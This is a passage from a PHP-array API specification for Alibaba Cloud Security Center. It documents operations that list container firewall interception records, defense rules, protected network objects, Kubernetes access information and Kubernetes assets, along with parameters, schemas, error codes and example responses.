namespace.', 'type' => 'string', 'example' => 'service****', 'title' => ''], 'RealSrcImageName' => ['description' => 'The source image name.', 'type' => 'string', 'example' => 'sas-servi****'."\n", 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query container firewall interception records', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListInterceptionHistory'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListInterceptionHistory', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"D81DD78E-E006-5C65-A171-C8CB0904****\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 45,\\n \\"Count\\": 10\\n },\\n \\"InterceptionHistoryList\\": [\\n {\\n \\"SrcNamespace\\": \\"service****\\",\\n \\"SrcRuleTargetName\\": \\"sas-web****\\",\\n \\"RiskLevel\\": 1,\\n \\"Status\\": 1,\\n \\"DstPort\\": 33,\\n \\"FirstTime\\": 1639718858000,\\n \\"SrcAppName\\": \\"sas-web****\\",\\n \\"RuleId\\": 136,\\n \\"RuleName\\": \\"all****\\",\\n \\"InterceptionName\\": 0,\\n \\"DstNamespace\\": \\"service****\\",\\n \\"LastTime\\": 1639731078000,\\n \\"DstAppName\\": \\"sas-web****\\",\\n \\"DstRuleTargetName\\": \\"sas-web****\\",\\n \\"ClusterName\\": \\"opa-terway-nonet****\\",\\n \\"TryCount\\": 34,\\n \\"InterceptionType\\": 0,\\n \\"RealInterceptionType\\": 0,\\n \\"Id\\": 1126,\\n \\"ClusterId\\": \\"c556c8133b5ad4378b7fc533ddbda****\\",\\n \\"RealSrcAppName\\": \\"sas-service****\\",\\n \\"RealSrcPodName\\": \\"sas-service-757b9d****\\",\\n \\"RealDstAppName\\": \\"sas-service****\\",\\n \\"RealDstPodName\\": \\"sas-web-84cc7dd9****\\",\\n \\"RealDstNamespace\\": \\"service****\\",\\n \\"RealDstImageName\\": \\"sas-servi****\\",\\n \\"RealSrcNamespace\\": \\"service****\\",\\n \\"RealSrcImageName\\": \\"sas-servi****\\\\n\\"\\n }\\n ]\\n}","type":"json"}]', ], 'ListInterceptionRulePage' => [ 'summary' => 'Queries defense rules that are configured for the container firewall feature.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The ID of the container cluster.'."\n", 'type' => 'string', 'required' => true, 'example' => 'cc41de13ab5474210bc0ce772a009****', 'title' => ''], ], [ 'name' => 'Criteria', 'in' => 'query', 'schema' => ['description' => 'The query condition.'."\n", 'type' => 'string', 'required' => false, 'example' => '80', 'title' => ''], ], [ 'name' => 'CriteriaType', 'in' => 'query', 'schema' => ['description' => 'The type of the query condition. Valid values:'."\n" ."\n" .'* **ID**'."\n" .'* **RULE_NAME**'."\n" .'* **SRC_TARGET**'."\n" .'* **DST_TARGET**'."\n" .'* **DST_PORT**'."\n" .'* **RULE_SWITCH**'."\n" .'* **INTERCEPTOR_TYPE**'."\n", 'type' => 'string', 'required' => false, 'example' => 'DST_PORT', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The number of the page to return.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries to return on each page.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '50', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'ACF97412-FD09-4D1F-994F-34DF12BR****', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.'."\n", 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the returned page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '19', 'title' => ''], 'PageSize' => ['description' => 'The number of entries returned per page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], ], 'title' => '', 'example' => '', ], 'InterceptionRuleList' => [ 'description' => 'An array that consists of information about the defense rules.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The information about the defense rule.'."\n", 'type' => 'object', 'properties' => [ 'RuleType' => ['description' => 'The type of the defense rule.'."\n", 'type' => 'string', 'example' => 'customize', 'title' => ''], 'RuleSwitch' => ['description' => 'The status of the defense rule. Valid values:'."\n" ."\n" .'* **1**: enabled'."\n" .'* **0**: disabled'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RuleId' => ['description' => 'The ID of the defense rule.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '30****', 'title' => ''], 'RuleName' => ['description' => 'The name of the defense rule.'."\n", 'type' => 'string', 'example' => 'test', 'title' => ''], 'SrcTarget' => [ 'description' => 'The source network object.'."\n", 'type' => 'object', 'properties' => [ 'AppName' => ['description' => 'The name of the application.'."\n", 'type' => 'string', 'example' => 'ack-jenkins-lawr****', 'title' => ''], 'RuleType' => ['description' => 'The type of the defense rule. Valid values:'."\n" ."\n" .'* **suggest**: intelligently recommended rule'."\n" .'* **customize**: custom rule'."\n" .'* **system**: system rule'."\n", 'type' => 'string', 'example' => 'customize', 'title' => ''], 'TargetId' => ['description' => 'The ID of the network object.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '40****', 'title' => ''], 'TargetName' => ['description' => 'The name of the network object.'."\n", 'type' => 'string', 'example' => 'mhh-te****', 'title' => ''], 'Namespace' => ['description' => 'The namespace.'."\n", 'type' => 'string', 'example' => 'jenkins', 'title' => ''], 'TargetType' => ['description' => 'The type of the affected assets.'."\n", 'type' => 'string', 'example' => 'containerId', 'title' => ''], 'ImageList' => [ 'description' => 'An array that consists of the images of the network object.'."\n", 'type' => 'array', 'items' => ['description' => 'The images.'."\n", 'type' => 'string', 'example' => 'nginx:1.****', 'title' => ''], 'title' => '', 'example' => '', ], 'TagList' => [ 'description' => 'An array that consists of tags added to the source network object.'."\n", 'type' => 'array', 'items' => ['description' => 'The tags added to the source network object.'."\n", 'type' => 'string', 'example' => 'bpm', 'title' => ''], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'DstTarget' => [ 'description' => 'The destination network object.'."\n", 'type' => 'object', 'properties' => [ 'AppName' => ['description' => 'The name of the application.'."\n", 'type' => 'string', 'example' => 'console', 'title' => ''], 'RuleType' => ['description' => 'The type of the defense rule. Valid values:'."\n" ."\n" .'* **suggest**: intelligently recommended rule'."\n" .'* **customize**: custom rule'."\n" .'* **system**: system rule'."\n", 'type' => 'string', 'example' => 'customize', 'title' => ''], 'TargetId' => ['description' => 'The ID of the network object.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '302001', 'title' => ''], 'TargetName' => ['description' => 'The name of the network object.'."\n", 'type' => 'string', 'example' => 'demo4****', 'title' => ''], 'Namespace' => ['description' => 'The namespace.'."\n", 'type' => 'string', 'example' => 'test', 'title' => ''], 'TargetType' => ['description' => 'The type of the network object.'."\n", 'type' => 'string', 'example' => 'IMAGE', 'title' => ''], 'Ports' => [ 'description' => 'An array that consists of information about the ports used by the destination server.'."\n", 'type' => 'array', 'items' => ['description' => 'The ports.'."\n", 'type' => 'string', 'example' => '{"tcp":"1234","udp":"5555"}', 'title' => ''], 'title' => '', 'example' => '', ], 'ImageList' => [ 'description' => 'An array that consists of the affected images.'."\n", 'type' => 'array', 'items' => ['description' => 'The affected images.'."\n", 'type' => 'string', 'example' => 'nacos:v2.0****', 'title' => ''], 'title' => '', 'example' => '', ], 'TagList' => [ 'description' => 'An array that consists of tags added to the destination network object.'."\n", 'type' => 'array', 'items' => ['description' => 'The tags added to the destination network object.'."\n", 'type' => 'string', 'example' => '111', 'title' => ''], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'OrderIndex' => ['description' => 'The order in which the entries are sorted.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1', 'title' => ''], 'InterceptType' => ['description' => 'The interception mode. Valid values:'."\n" ."\n" .'* **0**: monitor'."\n" .'* **1**: block'."\n" .'* **2**: alert'."\n" .'* **3**: allow'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'ListInterceptionRulePage', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListInterceptionRulePage'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListInterceptionRulePage', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"ACF97412-FD09-4D1F-994F-34DF12BR****\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 19,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 2,\\n \\"Count\\": 20\\n },\\n \\"InterceptionRuleList\\": [\\n {\\n \\"RuleType\\": \\"customize\\",\\n \\"RuleSwitch\\": 1,\\n \\"RuleId\\": 0,\\n \\"RuleName\\": \\"test\\",\\n \\"SrcTarget\\": {\\n \\"AppName\\": \\"ack-jenkins-lawr****\\",\\n \\"RuleType\\": \\"customize\\",\\n \\"TargetId\\": 0,\\n \\"TargetName\\": \\"mhh-te****\\",\\n \\"Namespace\\": \\"jenkins\\",\\n \\"TargetType\\": \\"containerId\\",\\n \\"ImageList\\": [\\n \\"nginx:1.****\\"\\n ],\\n \\"TagList\\": [\\n \\"bpm\\"\\n ]\\n },\\n \\"DstTarget\\": {\\n \\"AppName\\": \\"console\\",\\n \\"RuleType\\": \\"customize\\",\\n \\"TargetId\\": 302001,\\n \\"TargetName\\": \\"demo4****\\",\\n \\"Namespace\\": \\"test\\",\\n \\"TargetType\\": \\"IMAGE\\",\\n \\"Ports\\": [\\n \\"{\\\\\\"tcp\\\\\\":\\\\\\"1234\\\\\\",\\\\\\"udp\\\\\\":\\\\\\"5555\\\\\\"}\\"\\n ],\\n \\"ImageList\\": [\\n \\"nacos:v2.0****\\"\\n ],\\n \\"TagList\\": [\\n \\"111\\"\\n ]\\n },\\n \\"OrderIndex\\": 1,\\n \\"InterceptType\\": 1\\n }\\n ]\\n}","type":"json"}]', ], 'ListInterceptionTargetPage' => [ 'summary' => 'Queries the network objects protected by micro-segmentation (container firewall).', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'TargetName', 'in' => 'query', 'schema' => ['description' => 'The name of the network object.', 'type' => 'string', 'required' => false, 'example' => 'source-test-obj-0****'."\n", 'title' => ''], ], [ 'name' => 'TargetType', 'in' => 'query', 'schema' => ['description' => 'The object type. Valid values:'."\n" .'- IMAGE: image.', 'type' => 'string', 'required' => false, 'example' => 'IMAGE'."\n", 'title' => ''], ], [ 'name' => 'Namespace', 'in' => 'query', 'schema' => ['description' => 'The namespace of the network object.', 'type' => 'string', 'required' => false, 'example' => 'default'."\n", 'title' => ''], ], [ 'name' => 'AppName', 'in' => 'query', 'schema' => ['description' => 'The application name of the network object.', 'type' => 'string', 'required' => false, 'example' => 'frontend', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the page to return. Default value: **1**, which indicates the first page.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page for paging. Default value: 20. If you leave this parameter empty, 20 entries are returned by default.'."\n" .'> Do not leave PageSize empty.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'ImageList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of images included in the network object.', 'type' => 'array', 'items' => ['description' => 'The image information.', 'type' => 'string', 'required' => false, 'example' => 'jenkins-master:2.277'."\n", 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'TagList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of tags included in the network object.', 'type' => 'array', 'items' => ['description' => 'The tag information.', 'type' => 'string', 'required' => false, 'example' => 'app.kubernetes.io/instance:cas0-oms'."\n", 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The network object list information.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '028CF634-5268-5660-9575-48C9ED6B****', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information of the query result.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in paging.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page in paging.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '45', 'title' => ''], ], 'title' => '', 'example' => '', ], 'RuleTargetList' => [ 'description' => 'The list of network objects returned.', 'type' => 'array', 'items' => [ 'description' => 'The network object list.', 'type' => 'object', 'properties' => [ 'AppName' => ['description' => 'The application name included in the specified network object.', 'type' => 'string', 'example' => 'frontend', 'title' => ''], 'ImageList' => [ 'description' => 'The list of images included in the specified network object.', 'type' => 'array', 'items' => ['description' => 'The image information.', 'type' => 'string', 'example' => 'alpine:3.9.6', 'title' => ''], 'title' => '', 'example' => '', ], 'TagList' => [ 'description' => 'The list of tags included in the specified network object.', 'type' => 'array', 'items' => ['description' => 'The tag information.', 'type' => 'string', 'example' => 'chart:ack-arms-prometheus-1.1.0', 'title' => ''], 'title' => '', 'example' => '', ], 'TargetId' => ['description' => 'The ID of the network object.'."\n" .'>You can call the [ListInterceptionTargetPage](~~ListInterceptionTargetPage~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'example' => '400914', 'title' => ''], 'TargetName' => ['description' => 'The name of the network object.', 'type' => 'string', 'example' => 'destination-test-obj-Na3cF', 'title' => ''], 'Namespace' => ['description' => 'The namespace.', 'type' => 'string', 'example' => 'default', 'title' => ''], 'TargetType' => ['description' => 'The object type. Valid values:'."\n" .'- IMAGE: image.', 'type' => 'string', 'example' => 'IMAGE', 'title' => ''], 'ClusterId' => ['description' => 'The ID of the container cluster.', 'type' => 'string', 'example' => 'c3e2eae03eb064d2ebf940cd5e1b17****', 'title' => ''], 'ClusterName' => ['description' => 'The name of the container cluster.', 'type' => 'string', 'example' => 'sas-test-cnnf'."\n", 'title' => ''], 'RuleType' => ['description' => 'The rule type. Valid values:'."\n" .'- customize: user-defined rule.', 'type' => 'string', 'example' => 'customize', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query container firewall protection objects', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListInterceptionTargetPage'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListInterceptionTargetPage', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"028CF634-5268-5660-9575-48C9ED6B****\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 45\\n },\\n \\"RuleTargetList\\": [\\n {\\n \\"AppName\\": \\"frontend\\",\\n \\"ImageList\\": [\\n \\"alpine:3.9.6\\"\\n ],\\n \\"TagList\\": [\\n \\"chart:ack-arms-prometheus-1.1.0\\"\\n ],\\n \\"TargetId\\": 400914,\\n \\"TargetName\\": \\"destination-test-obj-Na3cF\\",\\n \\"Namespace\\": \\"default\\",\\n \\"TargetType\\": \\"IMAGE\\",\\n \\"ClusterId\\": \\"c3e2eae03eb064d2ebf940cd5e1b17****\\",\\n \\"ClusterName\\": \\"sas-test-cnnf\\\\n\\",\\n \\"RuleType\\": \\"customize\\"\\n }\\n ]\\n}","type":"json"}]', ], 'ListK8sAccessInfo' => [ 'summary' => 'Lists K8s access information.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas60Z3AE'], ], 'parameters' => [ [ 'name' => 'AliyunYundunGatewayProjectName', 'in' => 'query', 'schema' => ['description' => 'This parameter is deprecated and does not need to be specified.', 'type' => 'string', 'default' => 'Sas', 'required' => false, 'example' => 'None', 'title' => ''], ], [ 'name' => 'AliyunYundunGatewayApiName', 'in' => 'query', 'schema' => ['description' => 'This parameter is deprecated and does not need to be specified.', 'type' => 'string', 'default' => 'ListK8sAccessInfo', 'required' => false, 'example' => 'None', 'title' => ''], ], [ 'name' => 'AliyunYundunGatewayPopName', 'in' => 'query', 'schema' => ['description' => 'This parameter is deprecated and does not need to be specified.', 'type' => 'string', 'default' => 'Sas.2018-12-03.ListK8sAccessInfo', 'required' => false, 'example' => 'None', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for requests and responses. Valid values:'."\n" .'- **zh**: Chinese.'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'en', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The ID of the request. The China Chinese Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '0B48AB3C-84FC-424D-A01D-B9270EF46038'], 'K8sAccessInfos' => [ 'description' => 'The list of K8s access information.', 'type' => 'array', 'items' => [ 'description' => 'The K8s access information.', 'type' => 'object', 'properties' => [ 'ClusterName' => ['description' => 'The cluster name.', 'type' => 'string', 'example' => 'test', 'title' => ''], 'AliUid' => ['description' => 'The Alibaba Cloud UID of the user.', 'type' => 'integer', 'format' => 'int64', 'example' => '1960721413485****', 'title' => ''], 'InstallKey' => ['description' => 'The K8s installation key.', 'type' => 'string', 'example' => 'xxx', 'title' => ''], 'Id' => ['description' => 'The unique ID of the access information.', 'type' => 'integer', 'format' => 'int64', 'example' => '67070', 'title' => ''], 'ClusterId' => ['description' => 'The cluster ID.', 'type' => 'string', 'example' => 'c0da5e4cb82a848c4a57c4dc9f49a****', 'title' => ''], 'GroupId' => ['description' => 'The server group ID.', 'type' => 'string', 'example' => '11088522', 'title' => ''], 'ExpireDate' => ['description' => 'The expiration time.', 'type' => 'integer', 'format' => 'int64', 'example' => '1690596321613', 'title' => ''], 'GroupName' => ['description' => 'The server group name.', 'type' => 'string', 'example' => 'test', 'title' => ''], 'Vendor' => ['description' => 'The vendor.', 'type' => 'string', 'example' => 'ALIYUN', 'title' => ''], 'AuditRegionId' => ['description' => 'The region ID of the server.', 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], 'AuditProject' => ['description' => 'The Simple Log Service project for audit logs.', 'type' => 'string', 'example' => 'k8s-log-custom-your-project-sd89eh****', 'title' => ''], 'AuditLogStore' => ['description' => 'The Simple Log Service Logstore for audit logs.', 'type' => 'string', 'example' => 'audit-cf6baf6afa106eca665296fdf68b****', 'title' => ''], 'CpuArch' => ['title' => '', 'description' => 'The CPU architecture. Valid values: ARM architecture and x86 architecture.', 'type' => 'string', 'example' => 'arm'], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'List k8s access information', 'description' => 'Lists K8s access information.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListK8sAccessInfo'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListK8sAccessInfo', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"0B48AB3C-84FC-424D-A01D-B9270EF46038\\",\\n \\"K8sAccessInfos\\": [\\n {\\n \\"ClusterName\\": \\"test\\",\\n \\"AliUid\\": 0,\\n \\"InstallKey\\": \\"xxx\\",\\n \\"Id\\": 67070,\\n \\"ClusterId\\": \\"c0da5e4cb82a848c4a57c4dc9f49a****\\",\\n \\"GroupId\\": \\"11088522\\",\\n \\"ExpireDate\\": 1690596321613,\\n \\"GroupName\\": \\"test\\",\\n \\"Vendor\\": \\"ALIYUN\\",\\n \\"AuditRegionId\\": \\"cn-hangzhou\\",\\n \\"AuditProject\\": \\"k8s-log-custom-your-project-sd89eh****\\",\\n \\"AuditLogStore\\": \\"audit-cf6baf6afa106eca665296fdf68b****\\",\\n \\"CpuArch\\": \\"arm\\"\\n }\\n ]\\n}","type":"json"}]', ], 'ListKspmInstances' => [ 'summary' => 'Queries Kubernetes asset information.', 'methods' => ['post', 'get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'RegionId', 'in' => 'query', 'schema' => ['description' => 'The ID of the region where the instance resides.', 'type' => 'string', 'required' => false, 'example' => 'cn-hangzhou', 'title' => ''], ], [ 'name' => 'Criteria', 'in' => 'query', 'schema' => ['description' => 'The search conditions for assets. This parameter is in JSON format. Pay attention to letter case when you specify this parameter. The following fields are included:'."\n" ."\n" .'- **name**: the search item.'."\n" .'- **value**: the value of the search item.'."\n" .'- **logicalExp**: the logical relationship between multiple conditions. Valid values:'."\n" .' - **OR**: The conditions are in an OR relationship.'."\n" .' - **AND**: The conditions are in an AND relationship.'."\n" .'> You can search by region, instance name, instance ID, alert status, risk status, or tag.', 'type' => 'string', 'required' => false, 'example' => '[{"name":"vulStatus","value":"YES","logicalExp":"AND"}]', 'title' => ''], ], [ 'name' => 'LogicalExp', 'in' => 'query', 'schema' => ['description' => 'The logical relationship between multiple search conditions. Valid values:'."\n" ."\n" .'- **OR**: The search conditions are in an OR relationship.'."\n" .'- **AND**: The search conditions are in an AND relationship.', 'type' => 'string', 'required' => false, 'example' => 'OR', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page in a paged query. Default value: 20.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'maximum' => '100', 'example' => '20', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the page to return in the query results. Default value: 1, which indicates that the results are returned starting from page 1.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'CloudAssetTypes', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of asset type information for Kubernetes assets.', 'type' => 'array', 'items' => [ 'description' => 'The asset type information for a Kubernetes asset.', 'type' => 'object', 'properties' => [ 'AssetType' => ['description' => 'The type of the asset. Valid values:'."\n" ."\n" .'- **0**: Workload'."\n" .'- **1**: Service'."\n" .'- **2**: Namespace'."\n" .'- **3**: Authorization'."\n" .'- **4**: Storage'."\n" .'- **5**: Container'."\n" .'- **6**: Network'."\n" .'- **7**: Configuration'."\n" .'- **8**: Policies.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], 'AssetSubType' => ['description' => 'The subtype of the asset. The value is in the format of asset type - subtype. Valid values:'."\n" ."\n" .'- **0**: Workload'."\n" .' * **0**: Pod'."\n" .' * **1**: DaemonSet'."\n" .' * **2**: StatefulSet'."\n" .'- **1**: Service'."\n" .' * **0**: Service'."\n" .'- **2**: Namespace'."\n" .' * **0**: Namespace'."\n" .'- **3**: Authorization'."\n" .' * **0**: Role'."\n" .' * **1**: ClusterRole'."\n" .' * **2**: ClusterRoleBinding'."\n" .' * **3**: RoleBinding'."\n" .' * **4**: ServiceAccount'."\n" .'- **4**: Storage'."\n" .' * **0**: PersistentVolume'."\n" .' * **1**: PersistentVolumeClaim'."\n" .' * **2**: StorageClass'."\n" .'- **5**: Container'."\n" .' * **0**: Image'."\n" .'- **6**: Network'."\n" .' * **0**: Route'."\n" .' * **0**: Ingress'."\n" .'- **7**: Configuration'."\n" .' * **0**: ConfigMap'."\n" .'- **8**: Policies'."\n" .' * **0**: LimitRanges'."\n" .' * **1**: ResourceQuota.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], 'Vendor' => ['description' => 'The asset vendor. This parameter is fixed to **200**.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '200', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 10, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'Success' => ['description' => 'Indicates whether the API call is successful. Valid values:'."\n" .'- **true**: successful.'."\n" .'- **false**: failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '7532B7EE-7CE7-5F4D-BF04-B12447DDCAE1', 'title' => ''], 'PageInfo' => [ 'description' => 'The paging information for a paged query.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '55', 'title' => ''], 'Count' => ['description' => 'The number of entries on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '4', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Instances' => [ 'description' => 'The list of Kubernetes asset information.', 'type' => 'array', 'items' => [ 'description' => 'The Kubernetes asset information.', 'type' => 'object', 'properties' => [ 'RegionId' => ['description' => 'The ID of the region where the asset resides.', 'type' => 'string', 'example' => 'cn-hanghzou', 'title' => ''], 'Vendor' => ['description' => 'The asset vendor. This parameter is fixed to **200**.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], 'AssetType' => ['description' => 'The type of the asset.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'AssetSubType' => ['description' => 'The subtype of the asset.', 'type' => 'string', 'example' => '1', 'title' => ''], 'InstanceId' => ['description' => 'The instance ID.', 'type' => 'string', 'example' => 